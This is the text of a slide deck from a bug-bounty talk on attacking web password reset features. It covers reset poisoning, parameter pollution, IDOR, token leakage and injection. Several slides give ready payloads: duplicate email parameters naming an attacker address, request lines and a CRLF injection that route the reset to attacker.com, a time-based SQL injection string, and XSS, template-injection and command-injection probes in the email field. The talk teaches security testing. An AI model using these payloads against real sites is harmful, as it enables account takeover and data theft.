Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Abusing Password Reset Functionality

2d1ae5ea9354a50d87b46f4503d11f4e?s=47 Tuhin Bose
September 18, 2021

Abusing Password Reset Functionality


Tuhin Bose

September 18, 2021


  1. Abusing Password Reset Functionality By Tuhin Bose

  2. root@kali:~#whoami Bug Bounty Hunter CISO at Damn Secure Pentesting Hub

    Crowdsource Security Researcher at Detectify B. Tech in Cyber Security and Digital Forensics Ethically hacked and secured Google, National Cyber Security Center (Netherlands), NCIIPC, ISC2 (Top 25), Unilever (Top 25), Mastercard, Dell, Pinterest, SpaceX(Top 3) and many other programs
  3. Conclusion & QNA What is Password Reset? Common Password Reset

    Implementation in Web Application Hacking Password Reset Feature AGENDA Flows of Password Reset
  4. What is Password Reset?

  5. If an application has a login feature then there should

    be a password reset feature. In order to implement a proper user management system, developers must implement a password reset feature. It allows the users to reset their accounts' password.
  6. Common Password Reset Implementation in Web Applications

  7. Common Password Reset Implementation in Web Applications

  8. Flows of Password Reset

  9. Flow of Password Reset User entered his username/email. Server send

    a password reset link to the user. User open the password reset link and enter the new password. Password changed.
  10. Hacking Password Reset Feature

  11. Password Reset Poisoning 1.

  12. Password Reset Poisoning 1.

  13. Password Reset Poisoning 1.

  14. 2. HTTP Parameter Pollution (HPP) email=victim@gmail.com&email=attacker@gmail.com email[]=victim@gmail.com&email[]=attacker@gmail.com email=victim@gmail.com%20email=attacker@gmail.com email=victim@gmail.com|email=attacker@gmail.com {"email":"victim@gmail.com","email":"attacker@gmail.com"}

  15. 2. HTTP Parameter Pollution (HPP)

  16. 2. HTTP Parameter Pollution (HPP)

  17. 3. Insecure Direct Object Reference

  18. 4. Weak Encryption Sometimes developers uses weak encryption algorithms while

    generating password reset tokens. For example, sometimes they just encrypt the user id of user + timestrap using some weak encryption algorithms.
  19. 5. Password reset token leakage via referral header

  20. 6. Token leakage in response/JS files https://www.company.com/#/changePassword/ username/token

  21. 7. Session/Token is not expiring after password reset.

  22. 8. Paramminer : Discover hidden parameters (or append previously known

    parameters) in the request. Now try IDOR.
  23. 9. Try: POST https://attacker.com/resetpassword.php HTTP/1.1 POST @attacker.com/resetpassword.php HTTP/1.1 POST :@attacker.com/resetpassword.php

    HTTP/1.1 POST /resetpassword.php@attacker.com HTTP/1.1
  24. test@test.com'+(select*from(select(sleep(2)))a)+' 10. SQLi

  25. 11. Append a .json after the endpoint.

  26. 12. CRLF: /resetpassword?%0d%0aHost:%20attacker.com

  27. 13. Application Level DoS

  28. 14. If they are sending an otp for password reset,

    try 2fa bypass techniques. https://twitter.com/tuhin1729_/status/141481305505408 6152
  29. 15. Try homograph on password reset. email=victim@gmail.com email=victim@gmаil.com email=victim@xn--gmil-63d.com Using

    Unicode: Cyrillic Small Letter A
  30. 16. Change the request method and content-type and observe how

    the application is responding.
  31. 17. Append null bytes after your email and observe the

  32. 18. Try XSS, SSTI, Command Injection etc in the email

    field. hello+(<script>alert(1)</script>)@gmail.com "<%= 7 * 7 %>"@gmail.com hello+(${{7*7}})@gmail.com hello@`whoami`.xyz.burpcollaborator.net
  33. 19. Missing Rate Limit

  34. More: https://twitter.com/tuhin1729_/status/1437471718 142976007

  35. @tuhin1729 tuhinbose70@gmail.com